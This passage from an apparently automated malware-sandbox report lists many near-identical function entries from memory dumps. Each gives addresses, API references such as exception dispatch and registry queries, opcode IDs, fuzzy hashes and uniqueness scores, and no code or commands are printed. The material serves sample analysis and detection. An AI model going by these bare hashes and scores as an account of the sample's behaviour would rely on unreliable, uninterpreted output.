                                                • Instruction Fuzzy Hash: 144239B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0023803F, Relevance: 2.0, APIs: 1, Instructions: 540COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 0e735046a836fdabd04e941a66ea2e99ffdb6a2cba7407ce8932b1045e62c72b
                                                • Instruction ID: 3f98149ebd42a836d1bb89d6745f173b5e040448618a48987bf2c994ed21c1b1
                                                • Opcode Fuzzy Hash: 0e735046a836fdabd04e941a66ea2e99ffdb6a2cba7407ce8932b1045e62c72b
                                                • Instruction Fuzzy Hash: 724238B4A14228CFCB24DF70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00238084, Relevance: 2.0, APIs: 1, Instructions: 531COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 042b170ffd7550c4d1bf287ca93b4627bd71f1cb49ac195ba9a9ba5dcd7a8234
                                                • Instruction ID: 2d5401237be490d8097ec47355a01b12e169d2c9068263d8dceebe09ef2a3837
                                                • Opcode Fuzzy Hash: 042b170ffd7550c4d1bf287ca93b4627bd71f1cb49ac195ba9a9ba5dcd7a8234
                                                • Instruction Fuzzy Hash: 4C3239B4A14218CFCB24DF70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002380C0, Relevance: 2.0, APIs: 1, Instructions: 526COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 85765aedcd589e313858a313276a28224640316ee37918aff2f6b43c0d48dffd
                                                • Instruction ID: 00587a92c5dbae4072e34a9da39e4b137754e46b8ae29f8317ac2cc6a4550e73
                                                • Opcode Fuzzy Hash: 85765aedcd589e313858a313276a28224640316ee37918aff2f6b43c0d48dffd
                                                • Instruction Fuzzy Hash: 473228B4A14228CFCB24DF70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00238105, Relevance: 2.0, APIs: 1, Instructions: 519COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 935ccaa1c30324d63053b734021c53dac65d0cb57986602efcd144251bc7a9c8
                                                • Instruction ID: db78ff936ba3bea9a6239c878e31fa446658946a739f39f78c91268054816299
                                                • Opcode Fuzzy Hash: 935ccaa1c30324d63053b734021c53dac65d0cb57986602efcd144251bc7a9c8
                                                • Instruction Fuzzy Hash: 4E3228B4A14228CFCB249F70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0023814A, Relevance: 2.0, APIs: 1, Instructions: 512COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 89a4015e79f94bcd4112c1c2d35b66f80cde9cba1b322ebc96b3e81cd4ed82e1
                                                • Instruction ID: 689fd603da5a06d5aecde5a7dfc5fb6fb75a37a4ed23cf1d0ab87e2d49157693
                                                • Opcode Fuzzy Hash: 89a4015e79f94bcd4112c1c2d35b66f80cde9cba1b322ebc96b3e81cd4ed82e1
                                                • Instruction Fuzzy Hash: C13229B4A14228CFCB249F70C99869DB7B6BF48305F2084EAE50AE7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0023818F, Relevance: 2.0, APIs: 1, Instructions: 505COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: beb998689e9a55cb936dfbbfdcf10d63f2fcf3a10a4ec12f6305bb025f3f425f
                                                • Instruction ID: 0672c787a1e39ce399d9588b8c498bcf806dacc9e429038a6c5dbe703e4bcc8c
                                                • Opcode Fuzzy Hash: beb998689e9a55cb936dfbbfdcf10d63f2fcf3a10a4ec12f6305bb025f3f425f
                                                • Instruction Fuzzy Hash: 183228B4A14218CFCB249F70C99869DB7B6BF48305F2085EAE60AE7354DB748E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002381D4, Relevance: 2.0, APIs: 1, Instructions: 498COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 9e0029548ccd0286fcb6458666249d3f432630573400bcaf8d4a641eae3ad942
                                                • Instruction ID: bd52c09513659bde1632cb7fe6e37d61e4effa4ec9d8242b1d247b99032c73c2
                                                • Opcode Fuzzy Hash: 9e0029548ccd0286fcb6458666249d3f432630573400bcaf8d4a641eae3ad942
                                                • Instruction Fuzzy Hash: 123229B4A14219CFCB249F70C99869DB7B6BF48305F2084EAE60AE7354DB748E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00238219, Relevance: 2.0, APIs: 1, Instructions: 491COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: a5909e77be490e01928abbb6f46454272406eb11e2bf481b2762d60aa1bd843c
                                                • Instruction ID: 31d1db4f758516d0cc0351eaa5a300ac21c95016cb44100a3c1fde33c19b88bc
                                                • Opcode Fuzzy Hash: a5909e77be490e01928abbb6f46454272406eb11e2bf481b2762d60aa1bd843c
                                                • Instruction Fuzzy Hash: DD3229B4A14218CFCB249F74C99869DB7B6BF48305F2084EAE60AE7354DB748E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0023825E, Relevance: 2.0, APIs: 1, Instructions: 484COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 1ed3f76e7648f04d68e715d137b396eb4ce39dab00d05c3edbe5138e5be7d45b
                                                • Instruction ID: 83a7c70976c7fe221453804dd42ad748089ef311683fa1a7f114cce70d3378df
                                                • Opcode Fuzzy Hash: 1ed3f76e7648f04d68e715d137b396eb4ce39dab00d05c3edbe5138e5be7d45b
                                                • Instruction Fuzzy Hash: 632229B4A14219CFCB249F74C99869DB7B6BF48305F2084EAE50AE7350DB748E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002382A3, Relevance: 2.0, APIs: 1, Instructions: 475COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: ea1514eb6560fd8fc3062025cb2f439db1fc5066b4a1486d8aa5f7f001fc0e1c
                                                • Instruction ID: 4e3eae35be35fbe690f457066d34dcfc9c2ba1e747976833eb04891189f63c2d
                                                • Opcode Fuzzy Hash: ea1514eb6560fd8fc3062025cb2f439db1fc5066b4a1486d8aa5f7f001fc0e1c
                                                • Instruction Fuzzy Hash: FA2228B4A14219CFCB249F74C99869DB7B6BF48305F2084EAE50AA7350DB748E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002382DF, Relevance: 2.0, APIs: 1, Instructions: 470COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 4fff23b12edd9d5e7d57a6ceb8f56840f1038b1ec369410b42545f583aafc9e1
                                                • Instruction ID: 7f4800ae85abf14284322d18ddff3309ce5c906637700ef5d7179cd456bf8342
                                                • Opcode Fuzzy Hash: 4fff23b12edd9d5e7d57a6ceb8f56840f1038b1ec369410b42545f583aafc9e1
                                                • Instruction Fuzzy Hash: 3A2229B4A14219CFCB24AF74C99869DB7B6BF48305F2084EAE50AE7350DB748E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00238757, Relevance: 1.8, APIs: 1, Instructions: 304COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 6ed140ee03c789cb8f6635379172e18d1e7f42d03e931f34b28eb6b5f4563fef
                                                • Instruction ID: 2e9a3ee0867c4e8c87fcb565c7a348c9364bf461acfb7cb9e53bc9b5e022f2c4
                                                • Opcode Fuzzy Hash: 6ed140ee03c789cb8f6635379172e18d1e7f42d03e931f34b28eb6b5f4563fef
                                                • Instruction Fuzzy Hash: DBE14AB4A14219CFCB24DF30C9846ACB7B6BF48305F2084EAD60AA7350DB758E95CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0023879F, Relevance: 1.8, APIs: 1, Instructions: 297COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 631be0407dcf3d2af4c2925f061bc14bf154336782e2b2955145bb04bffa71c2
                                                • Instruction ID: 8da653209ef7a10a4213e98f62a6e71fe2202c99d95753c51d670e35fe17f214
                                                • Opcode Fuzzy Hash: 631be0407dcf3d2af4c2925f061bc14bf154336782e2b2955145bb04bffa71c2
                                                • Instruction Fuzzy Hash: 73D13AB4A14219CFCB24DF30C9946ACB7B6BF88305F2084EAD60AA7350DB758E95CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002387E7, Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: bb5769813fb661e9f5c1e1dfb92fe5c22e4f227102a6bb1034ca5b3b8137c335
                                                • Instruction ID: 783195c25642e965c94f31d0ebdc96802d86d1db13b71ac1cd04f5e2d353f22e
                                                • Opcode Fuzzy Hash: bb5769813fb661e9f5c1e1dfb92fe5c22e4f227102a6bb1034ca5b3b8137c335
                                                • Instruction Fuzzy Hash: 74D13AB4A14219CFCB24DF30C9946ACB7B6BF88305F2084EAD60AA7350DB758E95CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00238823, Relevance: 1.8, APIs: 1, Instructions: 283COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 2b362b45eebe033d18ee2934c5a76f5920b3df8655ebd7afd3f6005476b94bcb
                                                • Instruction ID: 4d6080dead716c1c31df1f4b79411c96bb9c786cb66d1ea6498b7328ebc3bb6e
                                                • Opcode Fuzzy Hash: 2b362b45eebe033d18ee2934c5a76f5920b3df8655ebd7afd3f6005476b94bcb
                                                • Instruction Fuzzy Hash: 97D14AB4A14219CFCB24DF30C9846ACB7B6BF88305F2084EAD60AA7350DB759E95CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00238881, Relevance: 1.8, APIs: 1, Instructions: 272COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 4215826a41808f5100d297ff8762174d26e4424f318a975693f506f6b1706924
                                                • Instruction ID: 7cc6c907529022082cfdad174c636bca14cccdbcba15e6aaa0d665cd86c81ab3
                                                • Opcode Fuzzy Hash: 4215826a41808f5100d297ff8762174d26e4424f318a975693f506f6b1706924
                                                • Instruction Fuzzy Hash: 8BC13BB4A14219CFCB24DF30C9846ADB7B6BF88305F2084EAD60AA7350DB758E95CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002388C9, Relevance: 1.8, APIs: 1, Instructions: 265COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 800f2e3c3c04180f6c4df5f4bfd816768f6c567d354ffe105372aa879f1daca2
                                                • Instruction ID: 58aebe05469b726d43236c99f4d18afd49ee7b1abef51d26f3e84dad41110cb7
                                                • Opcode Fuzzy Hash: 800f2e3c3c04180f6c4df5f4bfd816768f6c567d354ffe105372aa879f1daca2
                                                • Instruction Fuzzy Hash: 3AC14BB4A14219CFCB24DF70C9846A8B7B6BF88305F2084E9D60AA7350DB758E95CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00238911, Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: e203311c6821e9d17828579f6128c059f4fee42ad7a6b0a5c81c183cf8b6716b
                                                • Instruction ID: 7864c110013b4d78c042da52d8a7276cb9a48002712f6ffa5f98dc1af7184cb2
                                                • Opcode Fuzzy Hash: e203311c6821e9d17828579f6128c059f4fee42ad7a6b0a5c81c183cf8b6716b
                                                • Instruction Fuzzy Hash: 2FC15BB4A14219CFCB24DF70C9846A9B7B6BF88305F2084E9D60AE7350DB748E95CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00238959, Relevance: 1.8, APIs: 1, Instructions: 251COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 609c9240d81d92ac5aa06a894a08a51dd9f04d6b59419131927bd1cbcbe59df7
                                                • Instruction ID: ea7489fab8b056c7ed00344ad4f9c9dd376c127a7a99562c7b278f27588f954b
                                                • Opcode Fuzzy Hash: 609c9240d81d92ac5aa06a894a08a51dd9f04d6b59419131927bd1cbcbe59df7
                                                • Instruction Fuzzy Hash: EFB15BB4A14219CFCB24DF70C9846A8B7B6BF88305F2084E9D60AE7350DB748E95CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002389A1, Relevance: 1.7, APIs: 1, Instructions: 244COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 45e26d05b3255134793c47b381d0358f09cd15ee7e2ac9172a6d431224be198c
                                                • Instruction ID: 13afc77aa3245396d03d3a2db6e8683cb469b61d7d6e3fb1f91a2a8835eb0f47
                                                • Opcode Fuzzy Hash: 45e26d05b3255134793c47b381d0358f09cd15ee7e2ac9172a6d431224be198c
                                                • Instruction Fuzzy Hash: 8BB14BB4A14218CFCB24DF70C9846A9B7B6BF88305F2084E9D60AE7350DB748E95CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0052C936, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0052C9F9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359714399.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false
                                                Similarity
                                                • API ID: QueryValue
                                                • String ID:
                                                • API String ID: 3660427363-0
                                                • Opcode ID: c8b306ca3d2bbb92d0d344f6705ec6a83e9e9440c2149fbeec7374690ffa90cc
                                                • Instruction ID: 23e63599b6e2da0745e2168f183cf1aaabae278c9ec204d01bef7d493ceb0cb6
                                                • Opcode Fuzzy Hash: c8b306ca3d2bbb92d0d344f6705ec6a83e9e9440c2149fbeec7374690ffa90cc
                                                • Instruction Fuzzy Hash: C74102B1D002689FCB10CFA9D884ADEBFF1BF49344F65852AE818AB351D771A945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0052A800, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0052C78C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359714399.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 36d53562056401f045f9d076aaf8012cfa67b04dbf70de03015fd9077ce2d150
                                                • Instruction ID: b57a4d65e98476d105794623f54d90c2fd34de6c7b85272f78a90cb85ea755a6
                                                • Opcode Fuzzy Hash: 36d53562056401f045f9d076aaf8012cfa67b04dbf70de03015fd9077ce2d150
                                                • Instruction Fuzzy Hash: 00310EB4D002599FDB10CF99C188A8EFFF5BF49304F28856AE808AB341C7759845CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E11B0, Relevance: .3, Instructions: 309COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 119cd2ceb64dd7f4869b6a40888d9940f99e498a7768652f4da718fc17b1ed11
                                                • Instruction ID: 1bfdb63d959f19c40c6bf20dd057b260c179745f4e00b7a35687726added910e
                                                • Opcode Fuzzy Hash: 119cd2ceb64dd7f4869b6a40888d9940f99e498a7768652f4da718fc17b1ed11
                                                • Instruction Fuzzy Hash: 74B10334B082048FCB08EBB5D894AAE7BF6AF84304F14C479E9469B792EB34DD05CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E0DFF, Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a4d5306879e347bfc5ed60d8a9bcd4af0493b5e86d47dd4fac4c4c39172ee44
                                                • Instruction ID: 4139c3235b5a9b8d6499f8dda3b8bd52b9f3d2e08430297856ea5d6484dca18d
                                                • Opcode Fuzzy Hash: 3a4d5306879e347bfc5ed60d8a9bcd4af0493b5e86d47dd4fac4c4c39172ee44
                                                • Instruction Fuzzy Hash: F4A127307086818FC7199B7988986AE3BE2AF85304F1588BAE589DF3D6EF35CC45C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E0390, Relevance: .2, Instructions: 224COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d013823d9ace52aa49bfeed24c364eb5e27aa7d57957c6e282d66ce1714a635
                                                • Instruction ID: bb224d6977ac8b753a30b4cf779600093601004ab220873fe4d3874db9d4e9d2
                                                • Opcode Fuzzy Hash: 7d013823d9ace52aa49bfeed24c364eb5e27aa7d57957c6e282d66ce1714a635
                                                • Instruction Fuzzy Hash: 4F718C75B442198FDB18ABB4C81476E7AE3AFC8344F258839E606DB394EF749C428791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E0AE0, Relevance: .2, Instructions: 224COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a2e85e7d1b46f206eee1482fc716f37db3bd58070fad3d26e2fd8ae91f68179
                                                • Instruction ID: 0581300f59218b3d94a761ecb0861d77b9b5337586c4a2619baed28669220297
                                                • Opcode Fuzzy Hash: 8a2e85e7d1b46f206eee1482fc716f37db3bd58070fad3d26e2fd8ae91f68179
                                                • Instruction Fuzzy Hash: 8771C5747100544FEF296BA9DA4076F699FEB99314F205825E04BC77C5CEB8CCD583A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E0AF0, Relevance: .2, Instructions: 220COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 488e9277a7cd41a80223d58dc6f887b1b64e0361bcbe0201e9307e354045362f
                                                • Instruction ID: dd05e39d67ea7cbc174549cfda347f5c9264c05eb057e330e12173c9fa054c24
                                                • Opcode Fuzzy Hash: 488e9277a7cd41a80223d58dc6f887b1b64e0361bcbe0201e9307e354045362f
                                                • Instruction Fuzzy Hash: 7161B3747100544BEF296BE9EA4076F699FEB99314F205825E04BC77C4CEB8CCD583A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E0048, Relevance: .2, Instructions: 150COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7423f5c46f3b0cc21dda1ba25d68cf4f69c15b4ca1a4b9ee73351adfd4262b27
                                                • Instruction ID: 0b5b90aaea60a70b754a0752b9f8c07177daeb1273f94b8e3d7485f684f1ed4c
                                                • Opcode Fuzzy Hash: 7423f5c46f3b0cc21dda1ba25d68cf4f69c15b4ca1a4b9ee73351adfd4262b27
                                                • Instruction Fuzzy Hash: 9161A478D00218CFCB14EFB4E898A9DBBB2FF48305F508569E916A7351DB359986CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E06C3, Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82b34d4cea8323328612709f352ea084ef1c109e85bd3ad419c795bf508f396b
                                                • Instruction ID: e9d1c49208a735864fa16fd0b1ce3573eb072a5a84ba670e1c91e1f2552d9e23
                                                • Opcode Fuzzy Hash: 82b34d4cea8323328612709f352ea084ef1c109e85bd3ad419c795bf508f396b
                                                • Instruction Fuzzy Hash: 3A31E574B182949FC742EB78DC515AE7BF5EF85300B1484A6E548DB392EB34EC068B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E0006, Relevance: .1, Instructions: 82COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ba9614e6a91c9988dc8d68051b0c005efe1bc551853d370da3ae242e45e1c6d
                                                • Instruction ID: 6b1152f15cdf257b414c41299b7250a3056e32fc5927c011fc90d5e2bdde39ee
                                                • Opcode Fuzzy Hash: 4ba9614e6a91c9988dc8d68051b0c005efe1bc551853d370da3ae242e45e1c6d
                                                • Instruction Fuzzy Hash: DF319A74D083888FCB06EBF4C8A45DDBFB1BF4A304F5141AAD545AB293EB385906CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0017D48C, Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359547765.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a22c413fb2187c909941284a45de610cac0bf8aaff978a963395a9bd787ae0f9
                                                • Instruction ID: 501dde7aac0695dd122c6dbae45ec116a579206ac7b46568cc0258e1cd6e1ea5
                                                • Opcode Fuzzy Hash: a22c413fb2187c909941284a45de610cac0bf8aaff978a963395a9bd787ae0f9
                                                • Instruction Fuzzy Hash: FD212575600208DFDB05DF10E9C0B26BF76FF94328F24C569E8090B246C336D856CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0017D578, Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359547765.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1e94eca7b757a15a6b80fbc53dd473468060abf6f29373081badf6c8fb75611
                                                • Instruction ID: 65fc637406a2c39a3d9a7c07b4a558966b8410249ed95517b47f3ab675d8ceda
                                                • Opcode Fuzzy Hash: b1e94eca7b757a15a6b80fbc53dd473468060abf6f29373081badf6c8fb75611
                                                • Instruction Fuzzy Hash: C421CF75604248DFDB19DF50E980B2ABF75FF98328F24C569E80D0B246C336D856CAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0018D01C, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359558703.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
